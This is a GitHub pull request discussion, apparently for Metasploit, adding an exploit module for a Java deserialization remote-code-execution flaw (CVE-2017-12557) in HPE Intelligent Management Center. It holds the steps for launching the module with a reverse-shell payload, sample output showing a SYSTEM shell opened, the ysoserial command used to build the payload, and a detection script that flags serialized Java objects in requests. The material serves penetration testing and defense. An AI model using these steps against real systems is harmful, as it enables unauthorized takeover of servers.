CVE-2017-12557: HPE Intelligent Management Center Java Deserialization RCE #10947

Closed (wants to merge 19 commits)

Conversation

@carmaa (Contributor) commented Nov 10, 2018

Adds an exploit module for HPE Intelligent Management Center Java Deserialization RCE (Windows).

Test env setup

On a Windows machine, download and install HPE IMC from here:

https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=

You need .Net 2.0, but that's the only dependency.

Make sure to follow any instructions on setting up SSL correctly (certain cipher suites do not play well with the software). These instructions may vary depending on the Windows version you set it up on. On a Windows Server 2012 R2 I had to disable certain cipher suites.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/http/hp_imc_java_deserialize
  • set RHOSTS
  • set payload windows/shell/reverse_tcp
  • set LHOST
  • Receive reverse SYSTEM shell

Sample output

msf5 exploit(windows/http/hp_imc_java_deserialize) > check
[*] 192.168.1.2:8080 The target appears to be vulnerable.
msf5 exploit(windows/http/hp_imc_java_deserialize) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.2
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:58113) at 2018-11-10 23:06:10 +0100



C:\Program Files\iMC\client\bin>

@h00die (Contributor) commented Nov 10, 2018

Please add documentation, see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

Also, the PR queue is rather high right now. Not sure when someone will get to this (although it may pique someone's interest), so it may be a few weeks till a final review to land will happen.

@bcoles (Contributor) left a review comment:

Please use two spaces for indentation

bcoles and others added 5 commits November 11, 2018 08:04 (Co-Authored-By: carmaa <carsten@carmaa.com>)
@bcoles (Contributor) commented Nov 12, 2018

Thanks. The updates look good to me from a quick read through the code, although I have a few comments (see above).

Once you're happy with the module (pending #10947 (comment) and review comments), please add documentation.

@jrobles-r7 jrobles-r7 self-assigned this Nov 16, 2018
bcoles and others added 4 commits November 16, 2018 20:19
  • Fixed if/else block return (Co-Authored-By: carmaa <carsten@carmaa.com>)
  • Print payload length (Co-Authored-By: carmaa <carsten@carmaa.com>)
@carmaa (Contributor, Author) commented Nov 17, 2018

Alright, documentation added in eab26a0. Thanks for all the help so far @bcoles !

@bcoles bcoles added the docs label Nov 17, 2018
@bcoles bcoles removed the needs-docs label Nov 17, 2018
@jmartin-tech (Contributor) commented:

Jenkins test this please.

@asoto-r7 asoto-r7 changed the title Add RCE exploit for CVE-2017-12557 CVE-2017-12557: HPE Intelligent Management Center Java Deserialization RCE Nov 28, 2018
@asoto-r7 (Contributor) commented:

After discussing it with @jrobles-r7, I'm going to take point on this one.

@asoto-r7 asoto-r7 assigned asoto-r7 and unassigned jrobles-r7 Nov 28, 2018
@asoto-r7 (Contributor) commented Dec 1, 2018

@carmaa: The module works great! I would suggest setting the WfsDelay option to at least 5 seconds to give more time for the target to respond.

Also, I see you've used ysoserial-modified to generate the jsonss Base64 variables. Could you provide me with the steps to recreate the three sections: jsonss_start, jsonss_mid, and jsonss_end?

Thanks!

@bcoles (Contributor) commented Dec 2, 2018

Looks like the sanity checks are suffering their scheduled weekend insanity. As usual, this warning can be ignored.

@bcoles (Contributor) left a review comment:

LGTM

@carmaa (Contributor, Author) commented Dec 2, 2018

@asoto-r7: The process to create the payload was not straight-forward, that's why #10057 is a great idea. In the JSON1 payload specifically, there are several bytes that are dependent on the length of the command, so I had to find those bytes by trial and error. But the command that was used to create the serialised object was java -jar ysoserial-modified.jar JSON1 cmd "".
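The exchange above concerns Base64-encoded Java serialized objects delivered in an HTTP request. As an added detection-side example (not code from the PR, the module or ysoserial), the following scans a form-encoded POST body for parameters whose decoded value begins with the Java serialization stream header (STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005, which Base64-encodes to the familiar `rO0AB` prefix) and reports the outermost class name, the two facts a WAF rule or IDS alert for this class of bug would log. The sample body is constructed, with a hypothetical parameter name and a stub object, and is not a gadget chain.

```python
import base64
import re
from typing import Optional
from urllib.parse import quote, unquote

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72


def decode_candidate(value: str) -> Optional[bytes]:
    """Strictly Base64-decode a parameter value (standard or URL-safe alphabet), or None."""
    cleaned = re.sub(r"\s+", "", value).replace("-", "+").replace("_", "/")
    if len(cleaned) < 8:  # too short to carry even the 4-byte header plus anything useful
        return None
    cleaned += "=" * (-len(cleaned) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(cleaned, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def first_class_name(stream: bytes) -> Optional[str]:
    """Class name of the outermost object: magic, TC_OBJECT, TC_CLASSDESC, u2 length, name."""
    if not stream.startswith(JAVA_STREAM_MAGIC) or stream[4:6] != bytes([TC_OBJECT, TC_CLASSDESC]):
        return None
    length = int.from_bytes(stream[6:8], "big")
    name = stream[8:8 + length]
    return name.decode("utf-8", errors="replace") if len(name) == length else None


def find_java_objects(body: str) -> list[tuple[str, bytes]]:
    """Return (parameter name, decoded stream) for every form field that carries a Java object."""
    hits = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")  # split on the first '=' only; Base64 padding follows
        decoded = decode_candidate(unquote(raw))  # unquote keeps '+' intact, unlike parse_qs
        if decoded and decoded.startswith(JAVA_STREAM_MAGIC):
            hits.append((name, decoded))
    return hits


# Constructed sample: a stub stream naming java.util.HashMap as the outermost class.
_SAMPLE_STREAM = JAVA_STREAM_MAGIC + b"\x73\x72\x00\x11java.util.HashMap" + b"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00"
SAMPLE_BODY = "session=abc123&data=" + quote(base64.b64encode(_SAMPLE_STREAM).decode()) + "&note=hello+world"

if __name__ == "__main__":
    for param, stream in find_java_objects(SAMPLE_BODY):
        print(f"Java serialized object in parameter {param!r}: class {first_class_name(stream)}")
```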

@asoto-r7 (Contributor) commented Dec 3, 2018

@carmaa: Thanks for the module, and for the help. After having to retrace your steps, I can say I definitely appreciate your comment about finding the payload offsets "by trial and error". I documented my reproduction steps in the comments of the module to help the next person. :-)

@asoto-r7 (Contributor) commented Dec 3, 2018

Release Notes

The HP Intelligent Management Java Deserialization RCE module has been added to the framework. This exploits a Java deserialization vulnerability in HP Enterprise Intelligent Management Center PLAT version 7.3 E0504P2, providing a command-line or Meterpreter shell on the target.

7 participants